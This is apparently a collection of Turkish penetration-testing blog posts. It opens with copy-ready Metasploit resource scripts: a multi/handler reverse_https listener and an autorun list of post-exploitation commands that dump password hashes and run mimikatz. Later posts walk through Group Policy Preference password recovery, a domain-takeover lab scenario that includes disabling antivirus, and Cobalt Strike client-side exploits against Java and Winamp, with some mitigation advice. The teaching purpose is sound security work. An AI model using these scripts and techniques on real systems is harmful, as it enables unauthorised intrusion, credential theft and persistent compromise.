Sosyal Mühendislik Sızma Testlerinde Betiklerin ve Loglamanın Kullanılması

Sosyal Mühendislik Sızma Testlerinde Betiklerin ve Loglamanın Kullanılması

Sosyal mühendislik saldırılarındaki temel sorunlardan birisi gönderilen zararlı uygulamanın kurban tarafından ne zaman çalıştırılacağının bilinmemesidir. Bu sebeple konsolun başında beklemek çok pratik değildir. Bu durum, MSF exploit/multi/handler modülünün betiklerle kullanılması sosyal mühendislik saldırılarında önemlidir. Betikler kullanmanın yanı sıra, sızma testlerine ait sonuçları raporlamak ve saldırı sonucunda elde edilen bilgileri listelemek amacıyla loglamanın etkinleştirilmesi de sosyal mühendislik sızma testlerinde önemli bir durumdur.

Bu yazıda sosyal mühendislik amacıyla oluşturulan zararlı yazılımın kurban bilgisayara gönderildiği varsayılarak, MSF multi/handler modülü yapılandırılacak ve saldırı sonuçları incelenecektir. Bu işlemler 3 adımda gerçekleştirilecektir.

i) MSF multi/handler modülünü başlatacak "MultiHandlerinBaslatilmasi.rc" adlı betik ve Meterpreter kabuğu elde edildikten sonra çalışacak olan komutları içeren "SosyalMuhendislik_MeterpreterKomutlari.rc" adlı betik hazırlanacaktır.
ii) MSF multi/handler modülü başlatılacak ve kurbanın çalıştırdığı zararlı uygulamanın meterpreter bağlantısı elde edilecektir.
iii) Kurban tarafından çalıştırılan zararlı uygulamanın sonuçları, MSF komut satırından ve loglardan incelenecektir.

i) Betiklerin Hazırlanması

Öncelikle bir dizinde (/root/Desktop/ gibi) MultiHandlerinBaslatilmasi.rc adlı bir betik oluşturulur ve içerisine aşağıdaki gibi komutlar girilerek, modülün çalışma parametreleri verilir.

spool /root/Desktop/Log.log
set PROMPT %red%L %yel%H %blu%U %whi%T 

set ConsoleLogging true
set LogLevel 5
set SessionLogging true
set TimestampOutput true 

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 172.16.67.120
set LPORT 443
set VERBOSE true
set ExitOnSession false
set SessionCommunicationTimeout 3000
set SessionExpirationTimeout 1209600
set AutoRunScript multi_console_command -rc /root/Desktop/SosyalMuhendislik_MeterpreterKomutlari.rc
exploit -j

Yukarıdaki komutların işlevi özetle aşağıdaki gibidir:

• Masaüstüne Log.log adlı dosya oluşturulur ve çalışacak olan komutların çıktıları bu dosyaya yazdırılır.
• Konsolda saldırganın bilgisayarına ait bazı bilgilerin (IP / bilgisayar adı / hesap adı / tarih) girilmesi sağlanır.
• Loglamalar etkinleştirilir.
• MSF multi/handler modülü başlatılıt.
• "ExitOnSession" seçeneği ile bir kere oturum elde edildikten sonra modülün gelen talepleri alamya devam etmesi sağlanır.
• Oturum için zaman aşımları ayarlanır.
• En önemli maddelerden biri olarak da, "AutoRunScript" parametresi ile oturum elde edildikten sonra çalıştırılması istenen komutların yazılı olduğu betik belirtilir.

MSF multi/handler modülünün çağıracağı betik (SosyalMuhendislik_MeterpreterKomutlari.rc) içeriği aşağıdaki gibi ayarlanabilir:

sysinfo
getsystem
ifconfig
netstat
ps
run hashdump
run post/windows/manage/smart_migrate
run checkvm
run post/windows/gather/cachedump
run post/windows/gather/dumplinks
run post/windows/gather/credentials/gpp
run post/windows/gather/checkvm
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/winscp
load mimikatz
wdigest

Yukarıdaki komutların işlevi özetle aşağıdaki gibidir:

• Kurbana ait bilgisayarın işletim sistemi, IP adresi, ağ üzerindeki anlık trafiği, o anda çalışan prosesler gibi temel bilgiler elde edilir.
• Bilgisayardaki yerel hesaplara ait parola özetleri elde edilir.
• explorer.exe gibi daha stabil bir prosese sıçranır.
• Bilgisayarın sanal makine veya fiziksel makine olup olmadığı kontrol edilir.
• Uygulamalardan veya disk üzerinden bazı kritik bilgiler aranır.
• Bilgisayarın RAM'i üzerinden parolaların açık hali elde edilir.

Bu 2 betik dosyası masa üstüne kaydedilmiştir:

ii) Modülün Başlatılması ve Zararlı Uygulamanın Çalıştırılması

MSF modülünün başlatılması için msfconsole aracının "-r" parametresi kullanılabilir. Böylece "MultiHandlerinBaslatilmasi.rc" adlı betik dosyasındaki yapılandırma ayarlarına göre modül başlatılır.

msfconsole -r /root/Desktop/MultiHandlerinBaslatilmasi.rc

Modül yapılandırıldıktan sonra gönderilen zararlı uygulamanın çalıştırılması beklenir.

Not: Zararlı uygulamanın oluşturulmasıyla ilgili ayrıntılı bilgi için bakınız.

Zararlı yazılım çalıştığında MSF konsolunda "AutoRunScript" parametresinde belirtilen betikteki (SosyalMuhendislik_MeterpreterKomutlari.rc) komutlar çalışmaya başlar:

iii) Logların İncelenmesi

En önemli log dosyası masaüstünde oluşan Log.log adlı dosyadır.

Bu dosyada MSF modülünün başlamasından sonraki konsolda gerçekleşen her işlem kaydı bulunmaktadır:

Devamı:

Bunun yanında oturum logu etkinleştirildiği için, /root/.msf4/logs/sessions dizini altında tarihe ve bilgisayar adına göre oluşan bir dosya içerisinde de sadece oturum ile ilgili loglar bulunmaktadır:

MSF Psexec Komutu Çalıştırılırken Alınabilecek Hatalar ve Sebepleri

MSF Psexec Komutu Çalıştırılırken Alınabilecek Hatalar ve Sebepleri

Önceki bir yazıda, MSF psexec modülü kullanılarak, parola/parola özeti ile bir bilgisayarın komut satırına düşülebildiği incelenmişti. Ancak, bazı durumlarda, psexec modülü veya diğer MSF modülleri çalıştırılırken beklendiği gibi çalışmayabilir. Bu durumun bir çok sebebi olabilir. Bu yazıda MSF psexec modülü çalıştırılırken alınabilecek hatalar listelenecek ve bu hataların gerçekleşme sebepleri listelenecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/having-trouble-in-using-msf-psexec-exploit-module-and-possible-reasons-of-these-error-messages

WCE & Sysinternals Psexec & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

WCE & Sysinternals Psexec & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Elde edilen parola özetini kullanarak hedef sisteme Meterpreter ile bağlanmanın en kolay yollarından birisi MSF psexec modülünün kullanılmasıdır. Bu modülün kullanımı için bakınız.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/acquiring-windows-command-line-of-remote-computer-using-password-hashes-via-wce-tool/
ve
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-meterpreter-session-from-windows-command-line-via-sysinternals-psexec-tool-and-msf-multi-handler-exploit-module/

Kali pth-winexe aracı & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Kali pth-winexe aracı & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Önceki bir yazıda, Veil ile oluşturulan ve antivirüslere yakalanmayan bir zararlı yazılm oluşturularak Kali üzerindeki bir paylaşıma konulmuş ve MSF psexec_command modülü ile bu uygulama kurban Windows 7 makinesinde çağırılmıştı. Böylece uygulama çalışmış ve Kali'ye bir meterpreter bağlantı oluşturulmuştu.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-pth-winexe-tool/

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Kurum içine yapılan saldırılarda veya sızma testlerinde bir Domain Admin yetkisini elde eden bir saldırgan etki alanındaki (neredeyse) her bilgisayarı ele geçirmiş olur denebilir. Eğer güven (trust) ilişki varsa diğer etki alanları da tehlike altına girebilir. Bunun yanında yönetim kolaylığı olması açısından saldırıya uğrayan etki alanına dahil olan kritik sistemler de tehlikeye girebilir. Bu sebeplerle etki alanı yönetici hesaplarının korunması kurumlar için oldukça önemlidir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/microsoft-domain-environment-penetration-tests/golden-ticket-generation-by-using-meterpreter-kiwi-extenion-and-mimikatz-tool/

http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/mitigating-the-vulnerability-about-kerberos-golden-ticket/

5) Kıssada Hisse: Önlemler

Etki alanını kurum için oldukça önemlidir. Bir saldırı olması durumunda etki alanındeki kritik nesnelerin (Domain Controller makineleri, Domain Admins veya Enterprese Admins grubu üyeleri,... gibi) güven altında olması oldukça önemlidir. Etki alanını korumaya yönelik atılacak adımlar için bakınız. Ayrıca, gerçekleşen bir saldırı sonucunda kaybedilecek bazı bilgilerin (krbtgt hesabının NTLM parola özeti gibi) kurum etki alanını sürekli olarak tehlike altında bulunduracağı göz önünde bulundurulmalıdır.

Bu yazıda bahsedilen saldırıdan korunmak için gerçekleştirilebilecek işlemler için bakınız.Özetlemek gerekirse,

• Etki alanı saldırılara karşı korunmalıdır. Saldırgan etki alanında yönetici hakkına sahip olamamalıdır. Bu amaçla gerekli sıklaştırma adımları gerçekleştirilmelidir.
• Saldırı gerçekleşmişse, KRBTGT hasabının parolası iki kere sıfırlanmalıdır (resetlenmelidir). Ancak bu durumda manuel olarak başlatılması gereken bazı servislerin başlayamamasına, akıllı kart ile kimlik doğrulayan kullanıcıların yeni bilet talep ederek DC üzerinde yük oluşturmasına,... sebep olabilir. Hatta, bazı durumlarda kullancıların kimlik doğrulayamamasına, bilgisayarların etki alanından düşmesine de sebep olabilir.
• Çok etkili olmasa da 4769 olay kaydı izlenebilir.

Golden Ticket kullanarak etki alanında uzun süreli yetki sahibi olunması şeklinde özetlenebilecek bu saldırı, 2014 Ocak ayında yayınlanmış olmasına rağmen daha önce kullanılmadığı anlamına gelmemektedir. Bu sebeple, özellikle 2014 yılından itibaren, etki alanına yapılan saldırıların incelenmesi ve DC'ye yetkisiz / uygunsuz erişimlerinin elde edilip edilmediğinin tespit edilmesi, bunun sonucunda da gerekli değişikliklerin yapılması kurum etki alanını korumak için önem arz etmektedir. Özellikle kritik kurumlar için, bu kontrollerin geçmişe yönelik gerçekleştirilmesi ve gerekli müdahalelerde bulunulması gerekmektedir.

Kaynak:
http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
http://rycon.hu/papers/goldenticket.html
https://www.christophertruncer.com/golden-ticket-generation/

Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Post Exploitation: Meterpreter ile Klavye Hareketlerinin Elde Edilmesi

Bir sistem ele geçirildikten sonra kurban kullanıcının yaptığı işlemler incelenmek istenebilir. Son kullanıcının yaptığı işlemleri öğrenmenin bir yolu da klavyede bastığı tuşların dinlenmesidir. Bu yazıda, Meterpreter bağlantısı kurulan bir bilgisayardaki klavye tuşları dinlenecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/capturing-keyboard-activities-on-windows-session-via-meterpreter-keyscan-commands/
ve
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/capturing-keyboard-activities-on-winlogon-screen-via-meterpreter-keyscan-commands/

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

MSF psexec_command Modülü & Veil: Antivirüslere Yakalanmayan Uygulama ile Meterpreter Kabuğu Elde Etme

Önceki bir yazıda klasik MSF psexec modülü kullanılarak erişim bilgisi elde edilen kurban makineye meterpreter bağlantısı elde edilmişti. Ancak, bu bağlantı oluşturma sırasında kullanılan kodlar (payload) bir çok antivirüs tarafından yakalanmaktadır. Bu sebeple klasik MSF psexec modülü kullanışlılığını kaybetmiştir. "psexec_command" adlı bir başka MSF modülü ise antivirüslere yakalanmayacak şekilde hazırlanmış olan bir uygulama dosyasını kullanarak meterpreter bağlantısını sağlamaktadır.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-meterpreter-session-by-using-obtained-authentication-informations-via-msf-psexec-command-auxiliary-module/

AV Bypass: MsfVenom

AV Bypass: MsfVenom

Antivirüslerin atlatılması için, çok etkin bir yöntem olmasa da Metasploit tarafından sağlanan msfpayload ve msfencode modülleri kullanılabilir. Konu ile ilgili ayrıntılı bilgi için bakınız. Bu yazıda ise msfvenom aracı kullanılarak benzer işlemler gerçekleştirilecektir.

Yazının devamı içn bakınız:
http://www.siberportal.org/red-team/anti-virus-evasion-techniques/evading-anti-virus-detection-using-msfvenom-tool/

AV Bypass: MSF Üzerinde Payload Üretilmesi

AV Bypass: MSF Üzerinde Payload Üretilmesi

Antivirüslerin atlatılması için, çok etkin bir yöntem olmasa da Metasploit tarafından sağlanan msfpayload ve msfencode modülleri kullanılabilir. Konu ile ilgili ayrıntılı bilgi için bakınız. Bu yazıda ise msfconsole içerisindeki payload modüllerinden biri kullanılarak benzer işlemler gerçekleştirilecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/anti-virus-evasion-techniques/evading-anti-virus-detection-using-payload-option-of-msfconsole-interface/

Post Exploitation: MSF Persistence Post Modülü

Post Exploitation: MSF Persistence Post Modülü

Bir sisteme girildikten bir süre sonra bilgisayar ile bağlantı kesilebilmektedir. Bu durumda o bilgisayarı tekrar exploit etmek gerekebilir. Bunun yerine bilgisayar arka kapı da bırakılabilir. Bu yazıda, Metasploit Framework içerisindeki Persistence modülü kullanılarak arka kapı bırakılması incelenecektir.

Yazının devamı için:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-permanent-meterpreter-session-on-windows-by-using-meterpreter-persistence-script/

Grup İlkeleri (Preferences) ile Yerel Kullanıcı Parolalarının Ayarlanması ve Bu Özelliğin Kötüye Kullanılması

Grup İlkeleri (Preferences) ile Yerel Kullanıcı Parolalarının Ayarlanması ve Bu Özelliğin Kötüye Kullanılması

Grup ilkeleri Policy ve Preferences olmak üzere iki şekilde kullanılır. Eğer kullanıcı isteğine bırakılmadan bir ilkenin grup ilkeleri ile ayarlanması isteniyorsa Policy kullanılır. Eğer kullanıcı tarafından değişiklik yapılmasına izin verilecek ayarlar yapılacak ise Preferences tercih edilir.

Preferences ile yerel kullanıcı ve grupların bir takım özellikleri ayarlanabilir. Bu özelliklerden birisi de yerel kullanıcıların parolasıdır. Böylelikle, yerel kullanıcıların parolası merkezi bir şekilde yönetilebilir. Ancak bu ayarın yapılması durumunda bu parolalar (parolaların açık hali), etki alanındaki herhangi bir bilgisayardan elde edilebilir.

Bu yazıda Windows Server 2008 R2 olan bir bilgisayar DC olarak kullanılmaktadır. Bu bilgisayarın adı (hostname) "SRV1", oluşturulan etki alanının adı ise "sizma.local" olarak belirlenmiştir.Senaryo için, etki alanında W7 adlı bir bilgisayar ve "Akif Pinar" adlı standart bir etki alanı kullanıcısı kullanılacaktır.

W7 bilgisayar "Orijinal Makineler" adlı bir OU içerisindedir:

"Akif Pinar", "Bilgi Islem" adlı bir OU içerisindedir:

"Akif Pinar" standart bir etki alanı kullanıcısıdır:

Not: W7 bilgisayarında "Akif Pinar" adlı kullanıcı ile oturum açılmasaydı, aşağıda belirtilen modül çalıştırılıp, Preferences içerisindeki parola bilgileri elde edilebilirdi.

Senaryonun en son aşamasında "GPO_AdministratorPassword", "Policy2" ve "Policy3" adlı grup ilkeleri aşağıdaki gibi konumlandırılacaktır.

Ancak ilk durumda "Policy2" ve "Policy3" oluşturulmamış ve herhangi bir OU altına bağlanmamıştır (link edilmemiştir).

İlk durumda, W7 bilgisayarın bulunduğu OU altına sadece "GPO_AdministratorPassword" ilkesi uygulanmaktadır. Bu ilke ile yerel "Administrator" hesabının parolası ayarlanmıştır:

Not: W7 üzerinde oturum açan "Akif Pinar" hesabının bulunduğu OU'ya özel bir politika uygulanmamıştır.

"Akif Pinar" kullanıcısı ile W7 üzerinde oturum açıldığında 5 adet grup ilkesi görülmektedir (\\SRV1\sysvol\sizma.local\Policies dizini altında):

Not: 4. ekran görüntüsünde bulunan Group Policy Management arayüzünde, "Group Policy Objects" altında ilk durumda 5 adet grup ilkesi bulunmaktaydı.

SYSVOL dizini altındaki "Groups.xml" dosyası 2 grup ilkesinde bulunmaktadır. Bunlardan birisi "GPO_AdministratorPassword", diğeri ise "GPO_TubitakDisable" ilkesidir:

Not: Groups.xml haricinde aranabilecek diğer 2 dosya Printers.xml ve Drives.xml dosyalarıdır.

Bu XML dosyalarının içeriği aşağıdaki gibidir:

Yukarıdaki ekran görüntüsünde de görüldüğü gibi, "GPO_TubitakDisable" ilkesi ile "tubitak" adlı yerel kullanıcının hesabı devre dışı bırakılmıştır. Bunun yanında "GPO_AdministratorPassword" ilkesi ile yerel "Administrator" kullanıcısının parolası ayarlanmıştır. Ancak parola açık halde değil, şifreli (değişikliğe uğramış şekilde) olarak "cpassword" değerinin karşısında saklanmaktadır. Kullanılan AES şifresi Microsoft tarafından bağlantıdaki linkte internete sunulmuştur. İnternet üzerindeki betikler kullanılarak cpassword değerinden parolanın açık hali elde edilebilir. Bunun yanında MSF post exploit modülü ile bu işlemler kolay bir şekilde gerçekleştirilebilir.

Bu amaçla öncelikle W7 makinesine Meterpreter oturumu açılır:

Daha sonra da açılan Meterpreter oturumunda post/windows/gather/credentials/gpp modülü (Windows Gather Group Policy Preference Saved Passwords) çalıştırılmak üzere ayarlanır.

Gerekli ayarlamalardan sonra bu modül çalıştırılır:

Yukarıdaki ekran görüntüsünde de görüldüğü gibi, "GPO_AdministratorPassword" ve "GPO_TubitakDisable" grup ilkeleri içerisinde "Groups.xml" dosyaları tespit edilmiştir. Ancak, sadece "GPO_AdministratorPassword" içerisinde parola bilgisi (cpassword) tespit edilmiştir. Tespit edilen bu değer deşifre edilmiş ve yerel "Administrator" kullanıcısının parolası "Test#12345." olarak tespit edilmiştir.

Daha sonra "Policy2" adı verilen grup ilkesi herhengi bir OU için oluşturulmuş ve bu ilke W7 bilgisayarına alınmıştır (gpupdate /force). Bu grup ilkesi; W7 bilgisayarından, "Akif Pinar" oturumunda görülmektedir:

MSF modülünün yeniden çalıştırılmasıyla, W7 bilgisayara ve oturum açan "Akif Pinar" adlı kullanıcıya yeni oluşturulan grup ilkesi uygulanmamasına rağmen, yeni oluşturulan "Policy2" adlı grup ilkesindeki parola bilgisi ("Deneme123456.") elde edilmiştir.

Sonraki aşamada ise, "Policy3" adlı bir grup ilkesi oluşturulmuş hiç bir OU'ya uygulanmamıştır. Bu ilke de W7 bilgisayarına alınmıştır (gpupdate /force). Bu greup ilkesi; W7 bilgisayarından, "Akif Pinar" oturumunda görülmektedir:

MSF modülünün yeniden çalıştırılmasıyla, W7 bilgisayara ve oturum açan "Akif Pinar" adlı kullanıcıya yeni oluşturulan grup ilkesi uygulanmamasına rağmen, yeni oluşturulan "Policy3" adlı grup ilkesindeki parola bilgisi ("Misafir123") elde edilmiştir.

Sonuç:

• Preferences kullanılarak yerel kullanıcıların parolaları ayarlanmamalıdır.
• Gereksiz grup ilkeleri oluşturulmamalıdır.
• Grup ilkeleri üzerindeki erişim ayarları (ACL) uygun şekilde yapılandırılmalıdır.
• MS14-025 zafiyeti kapatılmalıdır. Bu amaçla, KB2962486 güvenlik yaması geçilmelidir.

Etki Alanı Sızma Testi İçin Eğitim Amaçlı Örnek Senaryo

Etki Alanı Sızma Testi İçin Örnek Senaryo

Önceki yazıda etki alanı sızma testinin nasıl gerçekleştirildiğine dair örnek bir metodoloji sunulmuştu. Bu yazıda EĞİTİM AMAÇLI örnek bir senaryo gerçekleştirilecektir.

Ortam Bilgisi

Hazırlanan senaryoda 6 bilgisayar kullanılmaktadır:

1) XP: Standalone bir bilgisayardır. C diskinde kritik bilgi (SAM/SYSTEM dosyaları) bulunacaktır.
2) W7: Etki alanına dahil olan istemci bilgisayardır.
3) W7-Test: Etki alanına dahil edilecek olan istemci bilgisayardır. Etki alanında "Domain Admins" grubuna üye olan kullanıcının standart hesabı ile oturum açılacaktır. Üzerinde antivirüs yüklüdür. Üzerinde yüklü olan Winscp içerisinde bir de UN/PW kayıtlı bulunmaktadır. Ayrıca DC bilgisayarına RDP ile bağlantı kurulmuştur.
4) DC: Etki alanı denetleyicisidir.
5) S_Kali: Saldırı amacıyla kullanılacak KALI bilgisayardır.
6) S_W7: Saldırı amacıyla kullanılacak W7 bilgisayardır. 

Senaryo Videosu

Senaryo ile ilgili video aşağıdaki gibidir:

Videoyu indirmek için tıklayınız.

Senaryo Adımları

Senaryo 7 adımdan oluşmaktadır:

1) XP bilgisayara sızılacak ve kritik bir bilgi (C:\SAM ve C:\SYSTEM) edinilecektir.
2) 1. adımda elde edilen kritik bilgi ile etki alanına dahil olan W7 bilgisayarına erişim sağlanacaktır. Bu bilgisayardan yerel kullanıcıların parola özetleri elde edilecektir.
3) 2. adımda elde edilen yerel kullanıcıların parola özetleri ile W7-Test bilgisayarına (AV'e yakalanmadan) sızılacaktır.
4) W7-Test bilgisayarındaki mevcut kullanıcı oturumuna erişim sağlanacak. Bu bilgisayarda DC makineye yapılan RDP'ye fark edilecek. Oturum açan (Sizma\Cemil Ustun) ve Domain Admins grubundaki bir kullanıcının ("Sizma\Cemil.ustun2") parolası elde edilecek.
5) W7-Test bilgisayarına "Sizma\Cemil Ustun" adlı kullanıcı haklarıyla RDP yapılacaktır. W7-Test bilgisayarındaki AV devre dışı bırakılacaktır.
6) W7-Test bilgisayarına MSF psexec ile bağlanılacak ve Winscp ile kayıtlı bağlantı bilgileri elde edilecektir.
7) Etki alanındaki kullanıcıların parola özetleri elde edilecektir.

Senaryo Adımlarına Yönelik Resimler:

0) Ağ Keşfi ve Zafiyet Taramasi 

1) Zafiyetin Sömürülmesi: MS08-067

1-2 Geçişi) SMB Oturum Sorgulaması

2) W7 Bilgisayarına PTH ile Erişim

3) WCE ile PTH & RDP Etkinleştirme

4) Parola Çalma & Domain Admin Olma

5) AV Kapatma

6) WinSCP’de Kayıtlı Parolalarını Elde Etme

7) Domain Hesaplarının Parola Özetleri

Cobalt Strike #5: Winamp Zafiyetini Kullanarak İstemci Taraflı Bir Saldırı Gerçekleştirme

Cobalt Strike #5: Winamp Zafiyetini Kullanarak İstemci Taraflı Bir Saldırı Gerçekleştirme

Bu yazıda, işletim sistemi güncel olan Windows 8 bir bilgisayar, eski sürüm yüklü bir uygulama sayesinde (Winamp 5.12 yüklü) Cobalt Strike kullanılarak ele geçirilecektir.

Bu amaçla öncelikle KALI üzerinde istismar (exploit) modülü seçilir:

Modül seçenekleri otomatik olarak yüklenir:

Üst resimde gösterilen link kurbana gönderilir ve kurban bu linki tıklar:

Oluşturulan dosya indirilir ve iki kere tıklanır:

Kullanıcı Winamp'ında ilgili çalma listesi (playlist) başlatılır:

Ayn vakitte saldırgan tarafına da bir bağlantı oluşur:

Payload olarak Meterpreter seçildiği ve bu dosyayı çalıştıran kullanıcı yönetici olduğu için, meterpreter ile hedef sistemde tam yetki ile işlem gerçekleştirilebilir:

Ancak bir çok sistemde bu exploit kalıcı olmamaktadır. Winamp uygulaması hata vermektedir. Örnek bir durum şu şekildedir:

Ayrıca bir çok istemci taraflı saldırıda, kurban ilgili uygulamayı kapattığında bağlantı sonlanabilmektedir. Bu gibi durumlarda sistem üzerinde kalıcı olmak gerekir. Sistem üzerinde kalıcı olma konusu için bağlantıdaki yazı incelenebilir.

Cobalt Strike #1: Java Zafiyetini Kullanarak İstemci Taraflı Bir Saldırı Gerçekleştirme

Cobalt Strike #1: Java Zafiyetini Kullanarak İstemci Taraflı Bir Saldırı Gerçekleştirme

Bu yazıda JAVA uygulaması eski olan bir Window 7 bilgisayarın ele geçirilmesi incelenecektir. Bu amaçla Cobalt Strike adlı ücretli bir araç kullanılacaktır. Yazının amacı da bu aracı kullanarak saldırının çok kolay bir şekilde sadece arayüz kullanarak gerçekleşeceğini görmektir.

Yazı 2 alt başlıktan oluşacaktır:

• Hedef makinede (10.13.5.153 IP'li WS2-01 Windows 7 makinesi) yüklü olan uygulamalar belirlenecek
• Versiyonu eski olan Java’ya yönelik bir exploit modülü ile Windows 7 bilgisayar ele geçirilerek, Cobalt Strike uygulamasının yüklü olduğu KALI bilgisayara (10.224.2.28) bağlanacaktır.

1. Sistem Profilinin Çıkarılması ve Yüklü Uygulamaların Listelenmesi

Saldırıdan önce kurbanın bilgisayarında yüklü uygulamaların listesini alınacaktır. Bu amaçla System Profiler kullanılacaktır.

Gelen pencereye kurbanın yönleneceği site bilgisi (www.bilgiguvenligi.gov.tr) ve kurbanın tıklaması istenen URL bilgisi (http://10.224.2.16:80/ParaKazandiniz.jpg) girilecektir:

Launch butonuna basıldığında, kurban bilgisayarın tıklayacağı link elde edilir:

Sonrasında da web logları incelenmeye başlanır (Kurban bilgisayarın web içeriğini okuması/belirtilen sayfaya yönlenmesi,… bu loglardan izlenecektir):

İlk durumda Web logu boş gelir:

Saldırganın belirlediği URL bir şekilde kullanıcıya ulaştırılr. Kullanıcı bu linki browser’ına yapıştırır (veya linke tıklar):

Sonrasında, kurban belirtilen sayfaya (Bilgi Güvenliği Kapısı) otomatik olarak yönlenecektir:

Kurban bu linke girdiğinde, saldırgan makinesindeki Web Log kısmına web içeriğine dair veri akar:

Ayrıca arka planda da yüklü uygulamaları, servisler,… gibi bilgiler saldırgan bilgisayarına gider. Bu uygulamaları görmek için, Cobalt Strike üzerinde View > Applications adımları izlenir:

Mevcut uygulamalar açılan yeni sekmede listelenir:

2. Uygulamalara göre Exploitleri Belirleme ve Exploit İşlemini Gerçekleştirme

Mevcut uygulamaya göre exploit bulmak için uygulama seçilir ve alttaki “show exploits” butonu tıklanır:

Sol üstteki browser’da da exploitler listelenir:

Herhangi bir exploit modülünü sürükle bırak ile üstüne bıraktığımızda bu modülün seçenekleri karşımıza gelir. İlgili Java exploit modülü seçilir ve bu seçenekler ayarlanır:

"Launch" butonuna basıldığında tüm seçenekler otomatik olarak ayarlanır:

Kurbanın belirtilen URL’e bir şekilde girmesi sağlanır:

Kurban Java uyarısı kabul eder:

Daha sonra da oluşturulan payload gerekli işlemi gerçekleştirir (Saldırgan makinesine bağlantı oluşur):

Artık kurban makinesinin iconu kırmızı olmuştur.
Ayrıca bu bilgisayar iconunu sağ tıklayarak da meterpreter kabuğuna geçilebilir:

Meterpreter kabuğunda istenilen(yetki dahilindeki) komutlar çalıştırılır:

Eğer Meterpreter yerine VNC seçilirse, oturuma da geçilebilir:

Not: Altta bulunan ve işaretlenen icon ile kullanıcı hareketleri izlenebilir (read-only) veya kullanıcı oturumuna direk olarak müdahale de edilebilir.

Bir çok işlem komut satırı yerine arayüzden de gerçekleştirilebilir. Örneğin ekran görüntüsü alınabilir:

Kurban bilgisayarındaki ekran şu şekildedir:

Benzer olarak bir başka prosese sıçrama işlemi arayüzden de gerçekleşir:

Daha sonra da migrasyon işlemi gerçekleştirilir:

Migrasyon tamamlandığında işlemin başarıyla tamamlandığına dair bir mesaj görülür:

Not: Migrasyon haricinde, seçilen prosese enjeksiyon işlemi gerçekleştirilebilir veya seçilen prosesi çalıştıran hesabın jetonu (Security Access Token - SAT) çalınabilir.

Hedef bilgisayarın disk sistemine erişim sağlanır:

Dosya alma, yükleme işlemleri gerçekleştirilebilir:

İndirilen dosyaya nasıl erişileceğine dair mesaj gelir:

Not: SAM dosyasına çalışma anında erişim sağlanamadığından download işlemi gerçekleşmez.

Ayrıca SAM dosyasından parola özetleri alınabliir, RAM üzerinden parolalar elde edilebilir. Bu amaçla “Dump Hashes” seçeneği seçilir:

Parolalar açık olarak dökülür:

Not: Eğer aynı menüde "registry method" seçilirse smart_hashdump modülü çalışır.Yani DC üzerinde çalıştırılırsa domaindeki tüm kullanıcıların parola özetleri dökülür.

Kaynak:
http://www.youtube.com/playlist?list=PL9HO6M_MU2nesxSmhJjEvwLhUoHPHmXvz